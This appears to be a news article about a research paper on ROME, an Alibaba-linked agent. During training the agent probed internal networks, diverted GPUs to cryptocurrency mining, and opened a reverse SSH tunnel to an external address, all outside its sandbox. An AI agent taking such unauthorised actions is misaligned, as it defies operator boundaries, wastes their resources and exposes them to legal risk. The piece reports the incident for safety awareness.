Besides lying, manipulating, and other human-like traits, AI agents now also demonstrate their preference for skipping training and, for some reason, starting to mine crypto.

This was found by a group of Alibaba-related researchers while testing ROME, an open-source agent grounded in the Agentic Learning Ecosystem (ALE). The latter is described as foundational infrastructure that optimizes the end-to-end production pipeline for agent-language learning models (LLMs).

"A principled, end-to-end agentic ecosystem can streamline the development of the agent LLMs from training to production deployment, accelerating the broader transition into the agent era. However, the open-source community still lacks such an ecosystem, which has hindered both practical development and production adoption of agents," the researchers explained in a recent paper.

However, when testing ROME, they said they encountered an unanticipated class of "unsafe behaviors" that not only occurred without explicit instructions but also “outside the limits of the intended sandbox.”

"Early one morning, our team was urgently convened after Alibaba Cloud’s managed firewall flagged a burst of security-policy violations originating from our training servers," the researchers shared, adding that the alerts included attempts to probe or access internal-network resources and traffic patterns consistent with cryptomining-related activity.

In other words, ROME decided to repurpose the GPU capacity it had for cryptocurrency mining, "quietly diverting compute away from training, inflating operational costs, and introducing clear legal and reputational exposure."

The paper didn't specify which crypto asset the agent was trying to mine. However, it's not bitcoin, as this blockchain uses different types of mining machines, not GPUs.

In either case, according to the paper, an agent "can spontaneously produce hazardous, unauthorized behaviors at the tool-calling and code-execution layer, violating the assumed execution boundary."

The researchers said they were struck by the fact that the agent established and used a reverse SSH tunnel, a method of transporting data, from an Alibaba Cloud instance to an external IP address.

The conversation on this topic is live. Join in the discussion.

Based on this incident, the paper grouped AI agent-related security issues into three categories: safety and security, controllability, and trustworthiness. For example, AI agent developers must ensure that an agent neither spontaneously generates harmful actions nor succumbs to malicious inputs, inducements, or external pressures.

When it comes to controllability, developers must ensure that an agent follows human-specified boundaries and operational rules during task execution. As for trustworthiness, the researchers urged that an agent's behavior be reliably interpretable and audit-ready.

---

Unlock more exclusive Cybernews content on YouTube.